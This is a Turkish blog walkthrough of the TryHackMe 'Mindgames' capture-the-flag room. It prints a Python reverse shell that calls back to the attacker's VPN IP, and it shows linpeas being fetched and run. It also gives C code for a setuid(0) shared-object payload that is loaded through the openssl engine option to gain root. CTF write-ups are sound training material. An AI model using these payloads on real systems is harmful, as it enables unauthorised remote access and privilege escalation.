Siber Güvenlik Portalı

  1. Anasayfa
  2. »
  3. CTF ÇÖZÜMLERİ
  4. »
  5. Tryhackme Mindgames Çözümü

Tryhackme Mindgames Çözümü

Siber Güvenlik Portalı Siber Güvenlik Portalı - - 5 dk okuma süresi
211 0
Tryhackme Mindgames Çözümü

Merhabalar, bugün ki yazımda Tryhackme Mindgames Çözümü sizler için paylaşacağım.

1-  İlk olarak portları tespit etmek için nmap ile port taraması yaparak başlıyorum.

Baktığımda bir şey elde edemedim sadece 22. ve 80. port açık olarak gözüküyor, dizin taraması yaparak dizinleri araştırmaya başlayalım.

2-  Gobuster aracılığıyla dizinleri taradım ve hiçbir şey çıkmadı. Sadece http içerisinde .html olarak ana sayfa gözüküyor.

Şimdi gidip siteyi ziyaret ederek araştırma yapmaya devam ediyorum.

3- Ana sayfayı incelediğimde python işlemleri ve brainfuck dili ile şifreleme yapılmış.

Dikkatli incelediğimde Hello world, yazdıktan sonra altında brainfuck dili ile şifreli hello world yazılmış, yine aynı şekilde devam ediyor.

İlginizi çekebilecek yazımız: Tryhackme Relevant Çözümü

4- Gelip yukarıda ki fibonacci yazan yeri çözdüğümüzde python kodlarını görüyoruz. Farklı farklı denelemer yapmaya devam ediyorum.

Kodları incelediğimde ise sitenin işe yarar bir şey elde edemedim.

 

5- Yine farklı bir sitede brainfuck diline merhaba dünya deneme olarak çevirip sitede deniyorum.

6- Oluşturduğumuz brainfuck kodlarını yazdık çalıştırdık ve string olarak hata verdi. Burada anladığım arka planda python kabul ediyor, böylece direkt olarak python reverse shell oluşturup makine içerisine giriş yapabiliriz.

Denemeye başlayalım.

7-Öncelikle ncat üzerinden 9001 portunu aktif ederek bağlantıyı beklemeye başlıyorum.

8- Bu siteye gidip https://copy.sh/brainfuck/text.html  reverse shell almadan önce vpn ip adres kısmını kendi tryhackme vpn adresinizi ekleyin ve siteye giderek brainfuck çevirilmiş shell’i oluşturalım.

Brainfuck kısmındaki her şeyi kopyalayalım.

import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“vpn ip adresi”,9001));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn(“/bin/sh”)

9- Yapıştırıp run it diyoruz.

10- Evet direkt olarak terminale bağlantıyı almış olduk. Bash kabuğuna geçmek için;

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’ kabuğa geçiş yaptık.

11- Home dizini içerisinden ilk bayrağımızı tespit ettik. Şimdi yetki yükseltme aşamasına geçebiliriz.

12- python3 -m http.server 8000 diyerek makinemiz üzerinden dosya almak için http.server aktif ettik.

Artık VPN ip adresimiz ve port üzerinden dosyaları hedef makine içerisine alabiliriz.

Eğer çalışmaz ve bağlanamazsanız firefox ağ ayarlarından vekil sunucusunu düzenleyin.

13- Github içerisinden linpeas.sh masaüstüme indirdim. Kendi makinem üzerinden hedef makineye linpeas.sh indirerek nasıl yetki yükselteceğimizi araştırmaya başlıyorum.

Aşağıda gördüğümüz gibi ayarladım ve hedef makineye indirmeye başlıyorum.

14- Tmp dizinine geçtim;

  • wget komutu ile makine içerisine linpeas.sh kurdum.
  • chmod +x linpeas.sh yetki verdim.

15- ./linpeas.sh yaparak çalıştırdım.

Baktığımda /usr/bin/openssl üzerinden yetki yükseltebileceğimizi fark ettim.

Araştırdığımda farklı kaynaklarda openssl üzerinden yetki yükseltmek için .c uzantılı derleme yaparak direkt olarak root içerisine geçiş yapabileceğimizi fark ettim.

16- Mousepad içerisine gelerek;

#include <unistd.h>

__attribute__((constructor))
static void init() {
setuid(0);
execl(“/bin/sh”, “sh”, NULL);
}

yazıp farklı kaydet diyip, yetkiyukseltme.c olarak kaydediyoruz.

17- Masaüstüne gelip;

  • mkdir exploit yazarak dizin oluşturdum.
  • mv yetkiyukseltme.c exploit diyerek dizin içerisine taşıdım.

18- Exploit olarak derleme başlıyorum.

  • gcc -c -fPIC yetkiyukseltme.c -o yetkiyukseltme.o
  • gcc yetkiyukseltme.o -shared -o yetkiyukseltme.so

Tekrardan http serverımızı aktif ediyoruz ve yetkiyukseltme.so olarak derlediğimiz .c kodunu hedef makineye indirme aşamasına geçiyorum.

19- Tmp dizininin içerisine indirdim.

openssl req -engine ./yetkiyukseltme.so dedim vee evet direkt olarak root içerisindeyiz.

Bayrağı bulduk ve Tryhackme Mindgames Çözümü  sonuna gelmiş bulunuyoruz. 🙂 Yeni yazılarda görüşmek üzere…

İlgili Yazılar

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir